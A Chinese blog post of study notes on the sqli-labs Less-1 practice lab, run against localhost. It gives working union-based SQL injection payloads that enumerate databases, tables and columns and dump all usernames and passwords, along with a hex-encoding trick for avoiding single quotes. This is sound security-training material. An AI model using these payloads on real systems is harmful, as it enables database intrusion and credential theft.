本文已参与「新人创作礼」活动,一起开启掘金创作之路。
查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema='库名'
(database())
查列:select column_name from information_schema.columns where table_name='表名'
Less ONE
SELECT * FROM users LIMIT 0,1;
其中limit第一位是从第几个开始,比如0代表从第一个(行)开始,而第二位的1代表的就是显示多少个数据
SELECT * FROM users WHERE id='1' or 1=1 -- ' LIMIT 0,1
--+(拼接 含空格) -- # 注释符
order by +num时 此方法可用来查看表中有多少列
对第num列进行排序
二分法猜解出less 1 存在三列
order by 5 --> order by 3 correct
查看哪些数据可以回显
mysql> SELECT * FROM users WHERE id='-1' union select 1,2,3 -- ' LIMIT 0,1
-> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.00 sec)
基本查询函数
mysql> select system_user(); 用户查询
+----------------+
| system_user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select current_user();
+----------------+
| current_user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select databases;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'databases' at line 1
mysql> select database(); 当前数据库查询
+------------+
| database() |
+------------+
| security |
+------------+
1 row in set (0.00 sec)
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.5.53 |
+-----------+
1 row in set (0.00 sec)
mysql> select @@datadir; 数据存放路径
+-------------------------------------+
| @@datadir |
+-------------------------------------+
| D:\phpStudy\PHPTutorial\MySQL\data\ |
+-------------------------------------+
1 row in set (0.00 sec)
mysql> select @@version_compile_os;
+----------------------+
| @@version_compile_os |
+----------------------+
| Win32 |
+----------------------+
1 row in set (0.00 sec)
mysql> select @@basedir; 安装路径
+--------------------------------+
| @@basedir |
+--------------------------------+
| D:/phpStudy/PHPTutorial/MySQL/ |
+--------------------------------+
1 row in set (0.00 sec)
group_concat()函数
mysql> select group_concat(password) from users;
+--------------------------------------------------------------------------------------------------+
| group_concat(password) |
+--------------------------------------------------------------------------------------------------+
| Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4 |
+--------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select * from users;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
concat_ws('~',A,B)
效果 A~B
concat函数讲解blog.csdn.net/qq_35211818…
SOS:避免在注入语句中使用单引号的方法
进行HEX编码
eg:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users limit 0,1 --+
-->
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users limit 0,1 --+
Conclusion
查询所有数据库
mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name |
+--------------------+
| information_schema |
| bus |
| business |
| challenges |
| dvwa |
| emlog |
| mysql |
| performance_schema |
| security |
| test |
+--------------------+
10 rows in set (0.00 sec)
查询库中所有表名
mysql> select table_name from information_schema.tables where table_schema='security';
+------------+
| table_name |
+------------+
| emails |
| referers |
| uagents |
| users |
+------------+
实战中记得避免在查询语句中出现单引号,进行hex编码
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479-- ' LIMIT 0,1
'security' --> 0x + hex(security)=0x7365637572697479
查询表中所有列名
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273-- ' LIMIT 0,1
查询列中信息
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from users -- ' LIMIT 0,1
mysql> select group_concat(concat_ws('~',username,password)) from users;
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| group_concat(concat_ws('~',username,password)) |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
